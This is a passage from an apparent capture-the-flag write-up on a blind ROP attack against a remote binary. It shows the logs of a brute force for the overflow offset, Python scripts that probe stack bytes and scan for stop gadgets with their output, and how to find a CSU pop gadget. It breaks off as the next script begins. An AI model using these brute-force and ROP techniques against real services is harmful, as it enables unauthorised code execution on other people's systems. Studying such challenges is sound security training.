[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\xda5r^\x7fBye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b"Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'\xad\xe9\x7fBye!\n"
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xd6\x97\x7fBye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc1\x7fBye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x7fBye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc0\xe3\xb0\xff\xff\x7fBye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc6\x15\x12\xfc\x7fBye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x05\x1e\xfc\x7fBye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9a\xfe\x7fBye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xfd\x7fBye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x7fBye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xe0\xa8\x8bn\xfd\x7fBye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x7f\xc6\xd8\xfe\x7fBye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xcd\n\xfd\x7fBye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x97\xfd\x7fBye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xfe\x7fBye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x7fBye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xcc\x06@Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> '
40

So now we know that we need 40 bytes of padding before the crash.

Stack reading

Stack reading is just basically a bruteforce of some bytes to trigger the orginal behaviour of the program. It permits especially to leak a stack canary or some saved instruction pointers. But I directly tried to find some stop gadgets, to do so, I'm looking for something in the response. And the best stop gadget would be a unique pattern.

I developped this small function:

def try_jmp(s):
    while True:
        try:
            io = start()
            io.write(s)
            resp = io.recv(500, timeout=30.0)[35:]
            break
        except:
            print(f"STOP: {sys.exc_info()[0]}")
            resp = -1 
            break

    return resp

def leak2(padding: str, leak1=b""):
    for i in range(256):
        buf = padding + leak1 + p8(i)
        resp = try_jmp(buf)
        # print(f"Trying on {hex(int.from_bytes(leak1+p8(i), 'little') << (64 - counter*8))}")
        if len(resp):
            print(f"[{hex(int.from_bytes(padd(leak1+p8(i)), 'little'))}] Output: {resp}")
            if len(leak1) < 8:
                leak2(padding, leak1=leak1+p8(i))
            else:
                return leak1
            continue

    return leak1

leak2(b"a"*40)

Which returns:

$ ./solve.py
[0x5] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x05\x06@'
[0x605] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x05\x06@'
[0x400605] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x05\x06@'
[0x400605] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x05\x06@'
[0x400605] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x05\x06@'
[0x1a] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1a\x06@'
[0x61a] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1a\x06@'
[0x40061a] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1a\x06@'
[0x40061a] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1a\x06@'
[0x1b] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1b\x06@'
[0x61b] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1b\x06@'
[0x40061b] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1b\x06@'
[0x40061b] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1b\x06@'
[0x40061b] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1b\x06@'
[0x40061b] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1b\x06@'
[0x1d] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1d\x06@'
[0x61d] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1d\x06@'
[0x40061d] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1d\x06@'
[0x40061d] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1d\x06@'
STOP: <class 'KeyboardInterrupt'>

I stopped the script because it's very long by it's already interesting to see that it seems we overwrite directly the return address, which means there is no canary. Morevever according to the addresses of the valid gadgets we found, the binary is not PIE based and it sounds to be a x86 binary.

Stop gadget

We can optimize the search of stop gadgets by bruteforcing only the two less significant bytes about the base address: 0x400000, which gives this:

def try_jmp(s):
    while True:
        try:
            io = start()
            io.write(s)
            resp = io.recv(500, timeout=30.0)[35:]
            break
        except:
            print(f"STOP: {sys.exc_info()[0]}")
            resp = -1 
            break

    return resp

def leak2_opti(padding: str):
    base = 0x400000

    for i in range(0x2000):
        buf = padding + p64(base+i)
        resp = try_jmp(buf)
        # print(f"Trying on {hex(int.from_bytes(leak1+p8(i), 'little') << (64 - counter*8))}")
        if len(resp):
            print(f"[{hex(base+i)}] Output: {resp}")
            continue

    return leak1

leak2(b"a"*40)

Which prints:

$ ./solve.py
[0x4004cc] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xcc\x04@'
[0x4004cd] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xcd\x04@'
[0x4004dd] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xdd\x04@'
[0x400550] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaP\x05@'
[0x400560] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa`\x05@Hello you.\nWhat is your name ?\n>>> '
[0x400562] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab\x05@Hello you.\nWhat is your name ?\n>>> '
[0x400563] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaac\x05@Hello you.\nWhat is your name ?\n>>> '
[0x400565] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaae\x05@Hello you.\nWhat is your name ?\n>>> '
[0x400566] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaf\x05@Hello you.\nWhat is your name ?\n>>> '
[0x400567] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag\x05@Hello you.\nWhat is your name ?\n>>> '
[0x400569] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaai\x05@Hello you.\nWhat is your name ?\n>>> '
[0x40056d] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaam\x05@Hello you.\nWhat is your name ?\n>>> '
[0x40056e] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaan\x05@Hello you.\nWhat is your name ?\n>>> '
[0x40056f] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaao\x05@Hello you.\nWhat is your name ?\n>>> '
[0x400570] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaap\x05@Hello you.\nWhat is your name ?\n>>> '
[0x400576] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaav\x05@Hello you.\nWhat is your name ?\n>>> '
[0x400577] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaw\x05@Hello you.\nWhat is your name ?\n>>> '
[0x400596] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x96\x05@'
[0x400597] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x97\x05@'
[0x40059c] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x9c\x05@'
[0x40059d] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x9d\x05@'
[0x4005a0] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xa0\x05@'
[0x4005a1] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xa1\x05@'
[0x4005a3] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xa3\x05@'
[0x4005a5] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xa5\x05@'
[0x4005b4] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xb4\x05@'
[0x4005b7] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xb7\x05@'
[0x4005b8] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xb8\x05@'
[0x4005c0] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xc0\x05@'
[0x4005d6] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xd6\x05@'
[0x4005d7] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xd7\x05@'
[0x4005dd] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xdd\x05@'
[0x4005de] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xde\x05@'
[0x4005e1] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xe1\x05@'
[0x4005e2] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xe2\x05@'
[0x4005e4] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xe4\x05@'
[0x4005e5] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xe5\x05@'
[0x4005e7] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xe7\x05@'
[0x4005e8] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xe8\x05@'
[0x4005eb] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xeb\x05@'
[0x4005ec] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xec\x05@'
[0x4005ee] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xee\x05@'
[0x4005ef] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xef\x05@'
[0x4005f1] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xf1\x05@'
[0x4005f3] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xf3\x05@'
[0x400605] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x05\x06@'
[0x400608] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x08\x06@'
[0x40061a] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1a\x06@'
[0x40061b] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1b\x06@'
[0x40061d] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1d\x06@'
[0x400622] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"\x06@'
[0x400650] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaP\x06@'
[0x400656] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaV\x06@What is your name ?\n>>> '
[0x400657] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaW\x06@What is your name ?\n>>> '
[0x400658] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaX\x06@What is your name ?\n>>> '
[0x40065a] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaZ\x06@What is your name ?\n>>> '
[0x40065e] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa^\x06@What is your name ?\n>>> '
[0x400663] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaac\x06@\x84(\xad\xfb\n>>> '
[0x400668] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaah\x06@>>> '
[0x40066d] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaam\x06@\x84(\xad\xfb'
[0x400672] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaar\x06@\x84(\xad\xfb'
[0x400677] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaw\x06@'
[0x400681] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x81\x06@'
[0x4006b4] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xb4\x06@Hello you.\nWhat is your name ?\n>>> '
[0x4006b5] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xb5\x06@Hello you.\nWhat is your name ?\n>>> '
[0x4006b6] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xb6\x06@Hello you.\nWhat is your name ?\n>>> '
[0x4006b8] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xb8\x06@Hello you.\nWhat is your name ?\n>>> '
[0x4006bd] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xbd\x06@\x84(\xad\xfb\nWhat is your name ?\n>>> '
[0x4006c2] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xc2\x06@What is your name ?\n>>> '
[0x4006c7] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xc7\x06@What is your name ?\n>>> '
[0x4006cc] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xcc\x06@Bye!\n'
[0x4006d1] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xd1\x06@\x84(\xad\xfb\n'
[0x4006d6] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xd6\x06@'
[0x4006db] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xdb\x06@'
[0x4006e2] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xe2\x06@'
[0x4006e3] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xe3\x06@'
[0x4006e5] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xe5\x06@'
[0x4006e6] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xe6\x06@'
[0x40073b] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;\x07@Hello you.\nWhat is your name ?\n>>> '
[0x400742] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaB\x07@'
[0x400743] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaC\x07@'
[0x400758] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaX\x07@'

If we read carefully, we can notice the [0x400668] Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaah\x06@>>> ' gadget. It's a very good stop gadget because it's the only gadget which prints: Thanks + padding + return_address_upto_null_byte + >>> . And so for our attack we will use it.

Brop gadget

Since we got the stop gadget, everything is easier. We just have to scan the .text of the remote binary to find the brop gadget which is basically the end of the csu in most of the binaries. It's easy to find because it's a pop of six qword like that:

pop     rbx
pop     rbp
pop     r12
pop     r13
pop     r14
pop     r15
retn

So we use a probe + trap * 6 + stop + trap*20 payload to find these kinf od gadgets. And so here is the script:

def unpadd(s):
